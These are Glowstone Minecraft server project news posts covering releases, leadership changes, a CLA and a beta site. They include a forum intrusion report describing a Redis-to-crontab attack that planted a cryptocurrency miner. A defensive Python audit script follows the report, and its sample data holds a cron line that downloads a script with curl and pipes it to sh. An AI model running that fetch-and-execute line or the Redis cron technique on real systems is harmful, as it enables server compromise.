Hi everyone, we are releasing Glowstone 2017.8.1, which is the first official release to support 1.12.1. Not much has happened since 2017.8.0, but here's the changelog nonetheless:
/tp player toplayer not doing anything (#554)
We've had a slow schedule this month, mostly due to everyone being busier than usual.
I have personally stepped down as project lead and have given this responsibility back to mastercoms because I will have much less time to give to this project due to college and other stuff.
Also, I'd like to welcome Postremus to our development team. He has been working a lot on this project recently and has implemented a lot of major features, including leashes this month.
That's it for now, we'll see you guys later! :^)
Hello again. Today we are releasing Glowstone 2017.8.0, which is the last release to support Minecraft 1.12. Since 1.12.1 was released, we will now bump our version to 2017.8.1 which will be released at the end of August (unless Mojang pushes another protocol update).
Since we released 2017.7.0 less than a week ago, not much has changed. Here is the changelog since that release:
We are now working on updating Glowstone to 1.12.1, which will be officially supported in the next monthly release (2017.8.1).
Hello again! The time has come for us to publish this month's release for Glowstone, 2017.7.0. We have plenty of new features this time around, including boats and paintings, as well as many bug fixes since 2017.6.1.
There has been a total of 40 commits by 8 contributors in July, with 4,491 additions and 730 deletions in 122 files.
I have personally been working on implementing pathfinding for Entity AI. After several months of on-and-off work on this issue, I have found an efficient solution to implement it, and I am aiming to have it all functional for the next release (2017.8).
We are continuously updating our Beta site with new features, and we are looking forward to your feedback. We are planning to have a complete 'Download Center' for Glowstone on there in the near future!
This is a post to notify everyone of a possible intrusion relating to the forum. I have provided a full report in an effort to be as transparent as possible.
Momo noticed that the forums were down. I was asleep at the time, and did not get the message until the morning - it was late at night.
I got Momo's message, and investigated the problem. I assumed that Redis was down, so I restarted it and updated and restarted the forums, and everything appeared to be working just fine. I noticed that the plugins we had installed were removed, and so I reinstalled them. No configuration data was lost. I also noticed that a couple of posts I had made a day or two before that were missing.
I noticed that a Nextcloud install on a different VM (my personal install) was using the same database server as a memory cache, despite being configured not to. I reconfigured Nextcloud and removed all of its cached data from the database. Nextcloud did not touch any actual NodeBB data, so that wasn't the cause of the issue.
At this point, we realised that data going back around a month and a half had been lost. Fearing further data loss, I set up some cron tasks to force Redis to save its data and save a backup every hour. I checked the Redis logs and there was nothing abnormal in them, so I assumed the problem was with NodeBB and continued investigating with Momo.
After reading over NodeBB logs, events and errors, we found nothing of interest.
At around 4AM BST, Momo became available again and continued his investigation. He discovered two things:
At around 8:30AM BST, I came online and restarted my investigation.
Due to an issue with Proxmox (the hypervisor I use to manage containers and VMs and keep things compartmentalised), it turned out that the firewall I had configured was not doing its job - instead of dropping all disallowed traffic as it was meant to, it was simply allowing everything. I fixed this problem by setting up a firewall directly on the storage container and this secured it from the outside.
I noticed that Redis was attempting to save data to /var/spool/cron, which is not its usual location. It did not have permission to write there - which is why it was failing to save data. Upon further investigation, I noticed that it was able to overwrite the crontab I had set up earlier - and had done so with the entire contents of the database. At this point, I took down both Redis and NodeBB so that I could fix things up.
I wiped all of the cron storage directories and reinstalled cron. I double-checked the Redis configuration and found nothing unusual, so I restarted that as well. It started up correctly and did not attempt to write to
I used a GUI tool to inspect the Redis data, and I noticed that the data I had removed previously (from Nextcloud) was still present. I removed it again, and I noticed an extra key that I hadn't seen earlier: It was a randomized key, containing a crontab entry. This crontab was configured to download a shell script from an IP address and execute it.
I grabbed a copy of the script myself and took a look at it, and it simply downloaded a cryptocurrency miner and ran it. Upon investigation, it was clear that this crontab had never been run, and that the attack was supposed to play out as follows:
CONFIG SET command to overwrite the crontab with the database
The cron daemon I'm using performs very strict syntax checks and did not run the crontab - as soon as it realised there were invalid "entries" in the file, it errored out.
I removed the key from the database and made sure the forum was running correctly.
While there was absolutely no evidence that this attack targeted NodeBB or even Glowstone specifically, precautions should always be taken. As NodeBB stores its entire database in Redis, all of the data therein was exposed. It's impossible to say what the attackers may have taken - if anything - but as always, users should take all of the necessary precautions.
NodeBB stores passwords using bcrypt. This is an industry standard and currently considered very secure, but we still advise users to change their passwords - both on the forums, and on any accounts they own elsewhere that may be using the same password as their forum account. Note that any other data provided during registration and profile modification will have been accessible as well - for example, email addresses.
I have revoked all the user tokens from GitHub OAuth, and reset the client secret, to protect users' GitHub accounts.
I'd like to apologise for this intrusion personally - it definitely shouldn't have happened, and while I'm amazed that it did, it is my responsibility. Please don't attack or bug any of the other staff members - they don't have direct access to any of this stuff.
As far as I am aware, everything is now secure and in working order, but I'm going to continue monitoring and testing throughout the day. Feel free to contact me if you have any questions.
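The indicators described in the report above (a Redis save directory pointing at cron storage, and a stray key holding a crontab entry that downloads a script) can be checked for mechanically. The following is an added example, not part of the original post or of NodeBB or Redis: the function names, the expected directory /var/lib/redis, the key names and all sample data are constructed assumptions, and the settings are given as a dict shaped like CONFIG GET output.

```python
import re

# Cron storage locations a Redis dump file should never be written to.
CRON_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/crontabs")

# Five cron schedule fields, then a command that fetches something over HTTP.
CRON_FETCH = re.compile(
    r"(?m)^\s*(?:[\d*/,\-]+\s+){5}.*\b(?:curl|wget)\b.*https?://"
)

def audit_config(config, expected_dir="/var/lib/redis"):
    """Return findings for a dict shaped like Redis CONFIG GET output."""
    findings = []
    save_dir = config.get("dir", "").rstrip("/")
    if any(save_dir == d or save_dir.startswith(d + "/") for d in CRON_DIRS):
        findings.append(f"dir points at cron storage: {save_dir}")
    elif save_dir != expected_dir:  # expected_dir is an assumption
        findings.append(f"dir is not the expected {expected_dir}: {save_dir}")
    if not config.get("requirepass"):
        findings.append("requirepass is empty")
    if config.get("protected-mode") != "yes":
        findings.append("protected-mode is off")
    return findings

def suspicious_keys(items):
    """Return names of string keys whose value looks like a crontab entry."""
    return [key for key, value in items.items() if CRON_FETCH.search(value)]

# Constructed sample data (192.0.2.0/24 is a documentation address range).
COMPROMISED = {"dir": "/var/spool/cron", "dbfilename": "root",
               "requirepass": "", "protected-mode": "no"}
HARDENED = {"dir": "/var/lib/redis", "dbfilename": "dump.rdb",
            "requirepass": "constructed-secret", "protected-mode": "yes"}
SAMPLE_KEYS = {
    "user:1:bio": "I run a small server, see http://example.org for details",
    "a8f3k2": "\n\n*/5 * * * * curl -s http://192.0.2.10/placeholder.sh | sh\n\n",
}

if __name__ == "__main__":
    for finding in audit_config(COMPROMISED):
        print("config:", finding)
    for key in suspicious_keys(SAMPLE_KEYS):
        print("key:", key)
```
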
Hello! We are releasing Glowstone 2017.6.1 today, the first release which officially supports Minecraft 1.12. This release consists mostly of the update to 1.12, some extra fixes to the server software and some community updates.
@s command target selector
Due to recent personal life events, Jessica (otherwise known as mastercoms) has decided to step down as project lead of Glowstone, after 3 years of continuous devotion for this awesome project. I would like to personally thank her for her immense help and love for this community over the past months and years.
The "core" Glowstone project team consists of Jessica, myself and Gareth (a.k.a. gdude2002). This will remain, as Jessica will continue to contribute to Glowstone, but she has decided to let go of her lead responsibilities to focus on other projects and ventures. Since the project still needs a leading entity, I will be taking this responsibility starting this month, and Gareth will continue helping as the project's community lead — he is far more active with the community than I can be.
If you have questions or concerns concerning this transition, please feel free to let us know on the forums, Discord, IRC, or privately at your own wish.
In April, satoshinm posted a rather interesting project named WebSandboxMC, which is a WebGL-based in-browser client powered by a Glowstone-compatible Bukkit plugin — essentially allowing you to browse and interact with a Minecraft server directly in the browser.
Over the past month, satoshi has been running a test server to find bugs and missing features in WebSandboxMC and since he's accomplished his goal, the server has been closed. If you're interested in the statistics, you can read all about it in his recent post on the subject.
WebSandboxMC is certainly a very interesting project, and is definitely worth a look by any server admin interested in this kind of interaction!
This is an announcement to let everyone know that we have come up with a CLA, otherwise known as a Contributor License Agreement. It's something we've been thinking about doing for a while, but decided that it deserved extra attention in light of the swift movement on Bountysource.
CLAs can look a bit scary, but every contributor submitting a pull request to Glowstone will be required to sign it. We've attempted to make that process as easy as possible - going forward, any new pull requests will automatically get a comment from the CLA helper. To sign the CLA, simply click the button in that comment and sign in with GitHub on the CLA helper site.
In short, by signing the Glowstone CLA, you confirm that:
If you'd like to read the CLA yourself, it's available here.
Note that we are not requiring previous contributors to sign the CLA, but if you do sign it, it applies retroactively.
If you would like to sign off your own bat before you make any further contributions or do any more work on your forks, feel free to do so here.
Hello, fellow Glowstone... ers...?
Welcome to the beta version of the new site! We've decided that the site could use a small facelift and the addition of some much-needed functionality, and this is a preview of what's to come. Some of the things you can look forward to include:
Currently the beta site is in a relatively early stage, and not everything works. We would appreciate it if you are able to give us feedback on this - you can do so on GitHub, on the forums, or on Discord.
We want to make sure this site will work well for everyone, so don't be afraid to speak up if there's something you don't like!